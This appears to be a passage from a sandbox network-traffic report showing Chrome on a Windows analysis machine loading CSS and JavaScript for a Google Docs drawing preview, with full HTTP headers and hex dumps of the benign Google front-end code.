                                                                                        Data Ascii: aoiu":"https://addons.gsuite.google.com/client","docs-eaofu":0,"docs-egsaoco":1,"docs-egsaoos":0,"docs-egsaosa":1,"docs-etpscd":0,"docs-egf":0,"docs-dafjera":1,"docs-daflia":1,"docs-dafgfma":1,"docs-spdy":0,"xdbcfAllowHostNamePrefix":1,"xdbcfAllowXpc":1,"
                                                                                        2024-12-18 01:10:02 UTC1390INData Raw: 22 64 6f 63 73 2d 74 65 78 74 2d 65 73 63 70 76 22 3a 31 2c 22 64 6f 63 73 2d 74 65 78 74 2d 65 63 66 73 22 3a 30 2c 22 64 6f 63 73 2d 74 65 78 74 2d 65 63 69 73 22 3a 31 2c 22 64 6f 63 73 2d 74 65 78 74 2d 65 64 63 74 7a 73 22 3a 31 2c 22 64 6f 63 73 2d 74 65 78 74 2d 65 65 74 78 70 63 22 3a 31 2c 22 64 6f 63 73 2d 74 65 78 74 2d 65 65 74 78 70 22 3a 31 2c 22 64 6f 63 73 2d 74 65 78 74 2d 65 72 74 6b 6d 63 70 22 3a 31 2c 22 64 6f 63 73 2d 74 65 78 74 2d 65 74 74 63 74 76 73 22 3a 30 2c 22 64 6f 63 73 2d 74 65 78 74 2d 65 74 74 74 73 22 3a 31 2c 22 64 6f 63 73 2d 74 65 78 74 2d 65 73 63 6f 75 62 73 22 3a 30 2c 22 64 6f 63 73 2d 74 65 78 74 2d 65 73 63 69 76 73 22 3a 30 2c 22 64 6f 63 73 2d 74 65 78 74 2d 65 73 63 69 74 72 62 73 22 3a 30 2c 22 64 6f 63 73
                                                                                        Data Ascii: "docs-text-escpv":1,"docs-text-ecfs":0,"docs-text-ecis":1,"docs-text-edctzs":1,"docs-text-eetxpc":1,"docs-text-eetxp":1,"docs-text-ertkmcp":1,"docs-text-ettctvs":0,"docs-text-ettts":1,"docs-text-escoubs":0,"docs-text-escivs":0,"docs-text-escitrbs":0,"docs


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.1649713172.217.19.2384436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:04 UTC1306OUTGET /static/drawings/client/css/2711563905-preview_css_ltr.css HTTP/1.1
                                                                                        Host: docs.google.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-arch: "x86"
                                                                                        sec-ch-ua-full-version: "117.0.5938.132"
                                                                                        sec-ch-ua-platform-version: "10.0.0"
                                                                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                        sec-ch-ua-bitness: "64"
                                                                                        sec-ch-ua-model: ""
                                                                                        sec-ch-ua-wow64: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: text/css,*/*;q=0.1
                                                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: style
                                                                                        Referer: https://docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: NID=520=bd20F08T1lo0pJWzF4cXwN7lvaVTKd5GII5jnqWT8zGK8hczuK9dlMwXBz2ubkMzIW1ieuVMp0GD4YWcN1fiAbwdVwShhRHtZ4nvfTsVLx3wE3zVQ60wvcahxY_J6ywEi_agrvZnK-NxQNQNoVQVxGWED3MM51RA-HGGbXxKWhCJh0LKHRofNQQ
                                                                                        2024-12-18 01:10:05 UTC781INHTTP/1.1 200 OK
                                                                                        Accept-Ranges: bytes
                                                                                        Vary: Accept-Encoding, Origin
                                                                                        Content-Type: text/css
                                                                                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/docs
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="docs"
                                                                                        Report-To: {"group":"docs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/docs"}]}
                                                                                        Content-Length: 312347
                                                                                        Date: Wed, 18 Dec 2024 01:10:05 GMT
                                                                                        Expires: Thu, 18 Dec 2025 01:10:05 GMT
                                                                                        Cache-Control: public, max-age=31536000
                                                                                        Last-Modified: Tue, 17 Dec 2024 20:54:01 GMT
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Server: sffe
                                                                                        X-XSS-Protection: 0
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-12-18 01:10:05 UTC609INData Raw: 2e 6a 66 6b 2d 62 75 74 74 65 72 42 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 30 73 20 6c 69 6e 65 61 72 20 31 73 2c 6f 70 61 63 69 74 79 20 31 73 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 68 65 69 67 68 74 3a 30 3b 6f 70 61 63 69 74 79 3a 30 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 6a 66 6b 2d 62 75 74 74 65 72 42 61 72 2d 69 6e
                                                                                        Data Ascii: .jfk-butterBar{border-radius:2px;box-shadow:0 2px 4px rgba(0,0,0,.2);transition:all 0s linear 1s,opacity 1s;border-style:solid;border-width:0;font-size:11px;height:0;opacity:0;visibility:hidden;overflow:hidden;padding:0;text-align:center}.jfk-butterBar-in
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 3a 31 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 34 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6f 70 61 63 69 74 79 3a 31 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 31 36 70 78 7d 2e 6a 66 6b 2d 62 75 74 74 65 72 42 61 72 2d 6d 69 6e 69 2e 6a 66 6b 2d 62 75 74 74 65 72 42 61 72 2d 73 68 6f 77 6e 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 36 70 78 7d 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 63 6f 6e 74 61 69 6e 65 72 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 6f 70 3a 33 32 70 78 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 34
                                                                                        Data Ascii: :1px;min-height:14px;height:auto;opacity:1;visibility:visible;padding:6px 16px}.jfk-butterBar-mini.jfk-butterBar-shown{padding:2px 16px}.docs-butterbar-container{font-weight:500;height:0;position:absolute;text-align:center;top:32px;width:100%;z-index:1004
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 2d 67 6d 20 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 62 75 74 74 65 72 2d 61 63 74 69 6f 6e 2c 2e 64 6f 63 73 2d 67 6d 20 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 64 69 73 6d 69 73 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 66 6c 65 78 3a 31 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 65 6e 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 64 6f 63 73 2d 67 6d 20 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 64 69 73 6d 69 73 73 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 30 70 78 3b 70 61 64
                                                                                        Data Ascii: -gm .docs-butterbar-butter-action,.docs-gm .docs-butterbar-dismiss{font-size:16px;text-decoration:none;flex:1;text-align:end;white-space:nowrap;font-family:Google Sans,Roboto,Helvetica,Arial,sans-serif}.docs-gm .docs-butterbar-dismiss{margin-left:80px;pad
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 63 73 2d 67 6d 20 2e 6a 66 6b 2d 62 75 74 74 65 72 42 61 72 2d 69 6e 66 6f 20 61 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 6c 69 6e 6b 2d 6e 6f 2d 70 61 64 3a 6c 69 6e 6b 2c 2e 64 6f 63 73 2d 67 6d 20 2e 6a 66 6b 2d 62 75 74 74 65 72 42 61 72 2d 69 6e 66 6f 20 61 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 6c 69 6e 6b 2d 6e 6f 2d 70 61 64 3a 76 69 73 69 74 65 64 2c 2e 64 6f 63 73 2d 67 6d 20 2e 6a 66 6b 2d 62 75 74 74 65 72 42 61 72 2d 69 6e 66 6f 20 61 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 64 6f 63 73 2d 67 6d 20 2e 6a 66 6b 2d 62 75 74 74 65 72 42 61 72 2d 69 6e 66 6f 20 61 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 31 61 37 33 65 38 7d
                                                                                        Data Ascii: cs-gm .jfk-butterBar-info a.docs-butterbar-link-no-pad:link,.docs-gm .jfk-butterBar-info a.docs-butterbar-link-no-pad:visited,.docs-gm .jfk-butterBar-info a.docs-butterbar-link:link,.docs-gm .jfk-butterBar-info a.docs-butterbar-link:visited{color:#1a73e8}
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 20 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 6c 69 6e 6b 2d 6e 6f 2d 70 61 64 3a 68 6f 76 65 72 2c 2e 64 6f 63 73 2d 67 6d 20 2e 6a 66 6b 2d 62 75 74 74 65 72 42 61 72 2d 69 6e 66 6f 20 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 38 35 61 62 63 7d 2e 64 6f 63 73 2d 67 6d 20 2e 6a 66 6b 2d 62 75 74 74 65 72 42 61 72 2d 77 61 72 6e 69 6e 67 20 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 62 75 74 74 65 72 2d 61 63 74 69 6f 6e 3a 68 6f 76 65 72 2c 2e 64 6f 63 73 2d 67 6d 20 2e 6a 66 6b 2d 62 75 74 74 65 72 42 61 72 2d 77 61 72 6e 69 6e 67 20 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 64 69 73 6d 69 73 73 3a 68 6f 76 65 72 2c 2e 64 6f 63 73 2d 67 6d 20 2e 6a 66 6b 2d 62 75 74 74 65 72
                                                                                        Data Ascii: .docs-butterbar-link-no-pad:hover,.docs-gm .jfk-butterBar-info .docs-butterbar-link:hover{color:#185abc}.docs-gm .jfk-butterBar-warning .docs-butterbar-butter-action:hover,.docs-gm .jfk-butterBar-warning .docs-butterbar-dismiss:hover,.docs-gm .jfk-butter
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 77 72 61 70 20 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 6c 69 6e 6b 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 70 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 52 6f 62 6f 74 6f 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 63 6f 6c 6f 72 3a 23 61 38 63 37 66 61 3b 68 65 69 67
                                                                                        Data Ascii: .docs-butterbar-wrap .docs-butterbar-link{border:1px solid transparent;border-radius:100px;box-sizing:border-box;cursor:pointer;font-family:Google Sans,Roboto,sans-serif;font-size:14px;font-weight:500;line-height:20px;white-space:nowrap;color:#a8c7fa;heig
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 3a 30 7d 2e 64 6f 63 73 2d 67 72 69 6c 6c 65 2d 67 6d 33 2e 64 6f 63 73 2d 67 6d 20 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 62 75 74 74 65 72 2d 61 63 74 69 6f 6e 3a 68 6f 76 65 72 2c 2e 64 6f 63 73 2d 67 72 69 6c 6c 65 2d 67 6d 33 2e 64 6f 63 73 2d 67 6d 20 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 64 69 73 6d 69 73 73 3a 68 6f 76 65 72 2c 2e 64 6f 63 73 2d 67 72 69 6c 6c 65 2d 67 6d 33 2e 64 6f 63 73 2d 67 6d 20 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 6c 69 6e 6b 2d 6e 6f 2d 70 61 64 3a 68 6f 76 65 72 2c 2e 64 6f 63 73 2d 67 72 69 6c 6c 65 2d 67 6d 33 2e 64 6f 63 73 2d 67 6d 20 2e 64 6f 63 73 2d 62 75 74 74 65 72 62 61 72 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 31 36 38 2c 31 39 39 2c 32
                                                                                        Data Ascii: :0}.docs-grille-gm3.docs-gm .docs-butterbar-butter-action:hover,.docs-grille-gm3.docs-gm .docs-butterbar-dismiss:hover,.docs-grille-gm3.docs-gm .docs-butterbar-link-no-pad:hover,.docs-grille-gm3.docs-gm .docs-butterbar-link:hover{background:rgba(168,199,2
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 2e 64 6f 63 73 2d 69 63 6f 6e 2d 69 6d 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 64 6f 63 73 2f 63 6f 6d 6d 6f 6e 2f 6d 61 74 65 72 69 61 6c 5f 63 6f 6d 6d 6f 6e 5f 73 70 72 69 74 65 37 37 32 5f 67 72 65 79 5f 6d 65 64 69 75 6d 2e 73 76 67 29 7d 2e 64 6f 63 73 2d 67 72 69 6c 6c 65 2d 67 6d 33 20 2e 64 6f 63 73 2d 6d 61 74 65 72 69 61 6c 20 2e 64 6f 63 73 2d 69 63 6f 6e 2d 69 6d 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 64 6f 63 73 2f 63 6f 6d 6d 6f 6e 2f 6d 61 74 65 72 69 61 6c 5f 63 6f 6d 6d 6f 6e 5f 73 70 72 69 74 65 37 37 32 5f 67 6d 33 5f 67 72 65 79 5f 6d 65 64 69 75
                                                                                        Data Ascii: .docs-icon-img:before{content:url(https://ssl.gstatic.com/docs/common/material_common_sprite772_grey_medium.svg)}.docs-grille-gm3 .docs-material .docs-icon-img:before{content:url(https://ssl.gstatic.com/docs/common/material_common_sprite772_gm3_grey_mediu
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 2d 62 75 74 74 6f 6e 2d 69 6e 6e 65 72 2d 62 6f 78 20 2e 64 6f 63 73 2d 69 63 6f 6e 2c 2e 64 6f 63 73 2d 6d 61 74 65 72 69 61 6c 20 2e 67 6f 6f 67 2d 74 6f 6f 6c 62 61 72 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 2d 63 61 70 74 69 6f 6e 20 2e 64 6f 63 73 2d 69 63 6f 6e 2c 2e 64 6f 63 73 2d 6d 61 74 65 72 69 61 6c 20 2e 67 6f 6f 67 2d 74 6f 6f 6c 62 61 72 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 2d 63 61 70 74 69 6f 6e 20 2e 67 6f 6f 67 2d 63 6f 6c 6f 72 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 2d 69 6e 64 69 63 61 74 6f 72 20 2e 64 6f 63 73 2d 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 2e 64 6f 63 73 2d 67 6d 20 2e 64 6f 63 73 2d 69 63 6f 6e 2d 76 69 64 65 6f 2d 63 61 6d 65 72 61 2d 66 72 6f 6e 74 2d 31 38 20 2e 64 6f 63 73 2d 69 63 6f 6e 2d 69 6d 67 3a 62 65
                                                                                        Data Ascii: -button-inner-box .docs-icon,.docs-material .goog-toolbar-menu-button-caption .docs-icon,.docs-material .goog-toolbar-menu-button-caption .goog-color-menu-button-indicator .docs-icon{margin-top:0}.docs-gm .docs-icon-video-camera-front-18 .docs-icon-img:be
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 73 2d 61 6e 61 6c 79 74 69 63 73 2d 73 69 64 65 62 61 72 2d 74 61 62 2d 73 65 6c 65 63 74 65 64 20 2e 64 6f 63 73 2d 69 63 6f 6e 2d 69 6d 67 2c 2e 64 6f 63 73 2d 67 6d 20 2e 64 6f 63 73 2d 6d 61 74 65 72 69 61 6c 20 2e 64 6f 63 73 2d 73 6d 61 72 74 2d 73 75 6d 6d 61 72 79 2d 74 69 6e 74 65 64 2e 64 6f 63 73 2d 69 63 6f 6e 2d 69 6d 67 2c 2e 64 6f 63 73 2d 67 6d 20 2e 64 6f 63 73 2d 6d 61 74 65 72 69 61 6c 20 2e 6b 69 78 2d 63 61 6c 65 6e 64 61 72 2d 74 65 6d 70 6c 61 74 65 2d 64 61 74 65 2d 72 61 6e 67 65 2d 70 69 63 6b 65 72 2d 62 6c 75 65 2d 69 63 6f 6e 20 2e 64 6f 63 73 2d 69 63 6f 6e 2d 69 6d 67 2c 2e 64 6f 63 73 2d 67 6d 20 2e 64 6f 63 73 2d 6d 61 74 65 72 69 61 6c 20 2e 6b 69 78 2d 74 61 73 6b 2d 62 75 62 62 6c 65 2d 62 6c 75 65 2d 69 63 6f 6e 20 2e
                                                                                        Data Ascii: s-analytics-sidebar-tab-selected .docs-icon-img,.docs-gm .docs-material .docs-smart-summary-tinted.docs-icon-img,.docs-gm .docs-material .kix-calendar-template-date-range-picker-blue-icon .docs-icon-img,.docs-gm .docs-material .kix-task-bubble-blue-icon .


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.1649714172.217.19.2384436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:04 UTC1308OUTGET /static/drawings/client/js/750391780-preview_integrated_core_integrated.js HTTP/1.1
                                                                                        Host: docs.google.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-arch: "x86"
                                                                                        sec-ch-ua-full-version: "117.0.5938.132"
                                                                                        sec-ch-ua-platform-version: "10.0.0"
                                                                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                        sec-ch-ua-bitness: "64"
                                                                                        sec-ch-ua-model: ""
                                                                                        sec-ch-ua-wow64: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: NID=520=bd20F08T1lo0pJWzF4cXwN7lvaVTKd5GII5jnqWT8zGK8hczuK9dlMwXBz2ubkMzIW1ieuVMp0GD4YWcN1fiAbwdVwShhRHtZ4nvfTsVLx3wE3zVQ60wvcahxY_J6ywEi_agrvZnK-NxQNQNoVQVxGWED3MM51RA-HGGbXxKWhCJh0LKHRofNQQ
                                                                                        2024-12-18 01:10:05 UTC788INHTTP/1.1 200 OK
                                                                                        Accept-Ranges: bytes
                                                                                        Vary: Accept-Encoding, Origin
                                                                                        Content-Type: text/javascript
                                                                                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/docs
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="docs"
                                                                                        Report-To: {"group":"docs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/docs"}]}
                                                                                        Content-Length: 143075
                                                                                        Date: Wed, 18 Dec 2024 01:10:05 GMT
                                                                                        Expires: Thu, 18 Dec 2025 01:10:05 GMT
                                                                                        Cache-Control: public, max-age=31536000
                                                                                        Last-Modified: Tue, 17 Dec 2024 20:54:01 GMT
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Server: sffe
                                                                                        X-XSS-Protection: 0
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-12-18 01:10:05 UTC602INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 28 5b 5d 29 3b 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 61 61 3d 22 45 64 67 65
                                                                                        Data Ascii: function _F_toggles_initialize(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]}_F_toggles_initialize([]);/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var aa="Edge
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 72 67 65 6f 6e 75 6e 64 65 72 67 6f 22 2c 72 3d 22 6e 75 6d 62 65 72 22 2c 75 3d 22 6f 62 6a 65 63 74 22 2c 78 61 3d 22 70 72 65 72 65 6e 64 65 72 22 2c 79 61 3d 22 73 65 76 65 72 69 74 79 22 2c 7a 61 3d 22 73 65 76 65 72 69 74 79 2d 75 6e 70 72 65 66 69 78 65 64 22 2c 77 3d 22 73 74 72 69 6e 67 22 2c 41 61 3d 22 73 75 63 63 65 73 73 22 2c 42 61 3d 22 74 72 75 65 22 2c 43 61 3d 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 44 61 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 78 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 45 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e
                                                                                        Data Ascii: rgeonundergo",r="number",u="object",xa="prerender",ya="severity",za="severity-unprefixed",w="string",Aa="success",Ba="true",Ca="unhandledrejection";function Da(){return function(a){return a}}function x(){return function(){}}function Ea(a){return function
                                                                                        2024-12-18 01:10:05 UTC1390INData Raw: 22 41 72 72 61 79 20 49 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 20 49 6e 74 31 36 41 72 72 61 79 20 55 69 6e 74 31 36 41 72 72 61 79 20 49 6e 74 33 32 41 72 72 61 79 20 55 69 6e 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 36 34 41 72 72 61 79 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 4a 61 5b 63 5b 65 5d 5d 3b 74 79 70 65 6f 66 20 66 3d 3d 3d 6e 26 26 74 79 70 65 6f 66 20 66 2e 70 72 6f 74 6f 74 79 70 65 5b 61 5d 21 3d 6e 26 26 48 61 28 66 2e 70 72 6f 74 6f 74 79 70 65 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75
                                                                                        Data Ascii: "Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array Float64Array".split(" "),e=0;e<c.length;e++){var f=Ja[c[e]];typeof f===n&&typeof f.prototype[a]!=n&&Ha(f.prototype,a,{configurable:!0,writable:!0,valu
